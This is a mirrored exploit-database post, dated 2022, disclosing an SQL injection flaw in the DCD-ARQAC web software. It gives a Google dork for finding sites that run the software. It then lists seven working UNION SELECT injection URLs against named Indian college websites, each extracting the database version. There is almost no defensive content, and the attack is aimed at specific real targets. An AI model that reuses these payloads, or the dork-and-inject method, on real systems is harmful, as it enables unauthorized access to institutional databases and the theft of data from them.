Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030028

Below is a copy:

DCD-ARQAC - Sql Injection Vulnerability
*********************************************************
#Exploit Title: DCD-ARQAC - Sql Injection Vulnerability
#Date: 2022-03-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed And Developed by Digital Content Development DCD-ARQAC, JSPM-TSSM"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Designed And Developed by Digital Content Development DCD-ARQAC, JSPM-TSSM"

https://www.jspmntc.edu.in/faculty_profile.php?id=-80%27%20/*!12345union*/%20select%201,2,3,4,5,6,version(),8,9,10,11--+

https://www.jspmrscoe.edu.in/drive_details.php?id=-6%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13--+

https://jspmjscopr.edu.in/event_details.php?id=-5%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13--+

https://jspmkimr.edu.in/event_details.php?id=-13%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13--+

https://www.jspmjscoed.edu.in/event_details.php?id=-4%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13--+

https://jspmntc.edu.in/event_details.php?id=-4%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13--+

https://jspmiav.edu.in/event_details.php?id=-1%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13--+


********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.